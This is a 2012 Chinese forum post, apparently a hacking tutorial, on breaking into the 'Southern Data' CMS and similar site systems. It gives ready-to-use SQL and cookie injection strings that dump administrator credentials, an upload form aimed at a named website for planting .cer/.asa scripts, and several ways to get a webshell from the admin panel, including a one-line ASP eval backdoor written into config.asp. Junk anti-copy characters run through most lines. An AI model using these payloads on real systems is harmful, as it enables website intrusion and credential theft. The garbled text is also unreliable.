找回密码
 立即注册
查看: 2948|回复: 0
打印 上一主题 下一主题

南方数据网站管理系统注入漏洞&后台拿WebShell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:06:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  /Databases/0791idc.mdb  {! `& \: ]& k# g6 X6 M: U
1.注入点:news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7
+ n. G4 i6 k) V也可能是(另外一个版本)news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7; W0 f! }6 W. a
直接暴管理员帐号密码(md5); H; L1 v8 @. y; o8 c& {5 z& M
2.登陆后台! i$ Z5 D$ F3 R2 l  i
3.利用编辑器上传:
/ ?% R" z2 w2 o1 x6 j访问admin/southidceditor/admin_style.asp
/ a. M& R. D7 W& B修改编辑器样式,增加asa(不要asp).然后直接后台编辑新闻上传.
& r# c' f  l8 ]5 v/ e1 V
4 o  ^( y' I3 X# X========================================
4 T# D5 K  V; [. V  O
& X$ E3 }; u( m% O! X参考资料整理:
# U: W; P% a1 q& [南方数据、良精系统、网软天下漏洞利用# q. C& P2 W2 {! P  ^# a2 n

) Q/ |9 @# S/ E+ \) w1、通过upfile_other.asp漏洞文件直接取SHELL4 P6 W% D  j* P' S
直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用本地上传文件进行上传代码如下:7 b$ V9 J6 g3 R( [1 c! t$ F; k
<HTML><HEAD> : C0 W# b) u& R$ z" Y1 Y; Q
<META http-equiv=Content-Type content="text/html; charset=gb2312"> : o! n, Q5 z/ V) }
<STYLE type=text/css>BODY {
' z8 `' X$ ]6 _  k: U5 a& ~$ s8 `FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee
: k5 t4 U5 S1 ]( t# u} 8 k. T7 ~7 G' |; c3 ?
.tx1 {
9 P+ O7 g, m  t' ~$ L7 _BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px
! c% @, m& r# k' F}
$ @+ c8 s& y( Y/ w% e! d</STYLE># w3 d+ B8 Y4 ~3 k/ w
<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD> ' Y0 b% c- B. A
<BODY leftMargin=0 topMargin=0> ! h, q* g8 t- H' `+ r
<FORM name=form1 action="http://www.huobaodidai.cn/upfile_Other.asp"; method=post ) D) e/ p( }' W
encType=multipart/form-data><INPUT class=tx1 type=file size=30 name=FileName> <INPUT class=tx1 type=file size=30 name=FileName1> <INPUT xxxxx="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上传 name=Submit> ) ]- I4 q' N* C+ N5 a6 j# {
<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>
( ]& m* k9 N& M- K$ [! g5 f( p; j, s# u5 _, J3 W# F( n1 f
将以上代码保存为html格式,替换代码中的网址,第一个框里选择图片文件,第二个框选择.cer、.asa或asp文件上传(后面需要加一个空格,貌似在IE8中进行使用不能后面加空格,加空格时就弹出选择文件对话框,我是找不到解决办法)。2 z( s3 J; z* m% y6 P
注:此方法通杀南方数据、良精系统、网软天下等; `' {6 S8 V- l" l0 w! n5 v
4 l5 H. n2 a: h: z7 k
2、通过注入秒杀管理员帐号密码,使用如下:
+ j$ G6 [6 d; R) t- Whttp://www.huobaodidai.cn/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20’’=’
9 F- l- q# E- Q2 N0 L以上代码直接暴管理员帐号和密码,取SHELL方法如下:! f* \2 E3 y  |+ I9 h) y1 b$ w
在网站配置[http://www.target.com/admin/SiteConfig.asp]的版权信息里写入 "%><%eval(request(chr(35)))%><%’: k! }) D& W3 T' w- H/ {
成功把shell写入http://www.target.com/inc/config.asp
" y2 @8 l" f* e这里一句话chr(32)密码是“#”8 y" g$ a* f9 C/ R
3、cookie注入
6 D: v+ S- j3 k$ \清空地址栏,利用union语句来注入,提交:
' P- ?# @% T- ]' Ijavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin"))- \/ i1 M  y$ J6 u1 A% |
如果你牛你就手工,反正我是不会,用刺猬大哥的“cookie注入转换工具”方便又迅速何乐而不为?
* O4 S( x/ E- f注:貌似南方数据、良精系统、网软天下等系统也都存在COOKIE注入。
! |6 X  {. q0 h+ W1 ]2 ~; U2 k) y(当然南方不只有上面三个漏洞,还有几个漏洞貌似不常用,反正我给我常用的总结出来希望对大家有帮助)
2 Q5 Y1 N) o6 ]5 W0 g/ L: ^8 }( P  P/ u2 v* ^6 W2 ^0 R
三、后台取SHELL方法总结
& Z0 q3 o% ]; ]6 O4 t  L1 C(1)在系统管理中的网站配置中插入一句话马:进入后台后,点左边的”系统管理”再点击”网站配置”在右边的”网站名称”(也可以在其它处)后加入"%><%Eval(Request(chr(112)))%><%’,再点保存配置,如图:
7 l+ S7 V4 {9 \6 Q) Y5 H; j然后我们打开inc/config.asp文件,看到一句话马已写入到配置文件中了,( \4 Y& P! M8 p% A# y( Z" J: A3 _9 g
这时再打开一句话马的客户端,提交同样得到一个小马
4 A9 c0 N7 d8 R' r6 R9 S(注:以下均在其它网站上测试所截的图,为防止信息泄漏,未截留网站连接,请谅解!)
# y4 C) c1 X$ O(2)后台上传漏洞,在Upfile_Photo.asp文件中部分代码片段如下:
3 K& |- j; o7 n7 Sif fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then1 }% X* v4 y& ?  V. v% l8 A
EnableUpload=false
7 y8 |% c( c1 B7 K" T# q4 ~& e6 J, q6 G: T! M! p
end if
# f' ~5 [' `  E. W1 d/ N* Rif EnableUpload=false then
/ V$ v: b6 \. \. R4 d( Y% t+ ymsg="这种文件类型不允许上传!nn只允许上传这几种文件类型:" & UpFileType
8 q/ k  T# M- l/ zFoundErr=true
% o5 m) i" e) v0 r& Qend if& c% a% f9 g4 E
大家可以看到程序只限制了对"asp","asa","aspx"类的文件上传,我们只要在”网站配置”的允许的上传文件类型处增加上传“cer“等被服务器可解析的文件类型就可,如图:& v( T2 F* p- `( \  H2 J" |
提交时却显示下载页面 ,上传其它如”htr,cdx”等后缀文件时,提交时服务器却不请求(只能说运气不好吧)3 N: v/ F9 N4 d1 [0 U! C# R
(3)后台备份,直接在”产品管理”下的添加产品中上传jpg后缀的asp马,再到”系统管理”下的数据库备份,在”当前数据库路径”栏填入上传的路径,在” 备份数据库名称”填入你要备份马的名称,不过系统会在名称后自动添加上.asa的7 L$ L+ g0 z) a, `" y5 k; G

2 I& E+ q1 Z% f: v  J, N点”确定”后提示”备份数据库成功….”不过实际文件是没有.asa的  Z! m# X2 P$ {; A: ~" o
直接访问备份后的地址,就得到一个webshell
! ]7 {; q) _0 f0 F" L(以上虽用网软做的后台演示,但南方和良精后台取shell都是大同小异的)​
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表